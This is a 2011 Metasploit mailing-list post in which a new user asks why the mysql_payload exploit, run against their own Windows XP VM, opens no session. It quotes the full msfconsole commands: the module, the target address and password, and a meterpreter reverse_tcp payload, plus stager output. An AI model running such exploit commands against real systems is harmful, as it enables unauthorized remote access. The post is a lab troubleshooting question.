Metasploit mailing list archives
payload meet wsh failure?
From: Linan Wang <wang.linan () gmail com>
Date: Wed, 8 Jun 2011 22:17:10 +0100
Hi list, I have played with the mysql_payload exploit for a full day but got to this trouble: ... the exploit successfully uploaded a file and defined a mysql udf, which enabled next step payload deliver ... no matter what payload i choose, no session was created. I look into the target machine's even log, it reported Failure Audit: Attempt to execute Windows Script Host while it is disabled. I guess there is advanced someway to manipulate the payload. (yes, it's my 1 day with msf) msfconsole log: ============================================================ use windows/mysql/mysql_payload set RHOST 192.168.1.67 set PASSWORD 123456 set PAYLOAD windows/meterpreter/reverse_tcp exploit ============================================================ output: ============================================================ [*] Started reverse handler on 192.168.1.2:4444 [*] Checking target architecture... [*] Checking for sys_exec()... [*] sys_exec() already available, using that (override with FORCE_UDF_UPLOAD). [*] Command Stager progress - 1.47% done (1499/102246 bytes) [*] Command Stager progress - 2.93% done (2998/102246 bytes) .... [*] Command Stager progress - 98.19% done (100400/102246 bytes) [*] Command Stager progress - 99.59% done (101827/102246 bytes) [*] Command Stager progress - 100.00% done (102246/102246 bytes) [*] Exploit completed, but no session was created. ============================================================ the target is a clean windows xp vm without any anti-virus installed. any suggestion? thx LW
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- payload meet wsh failure? Linan Wang (Jun 08)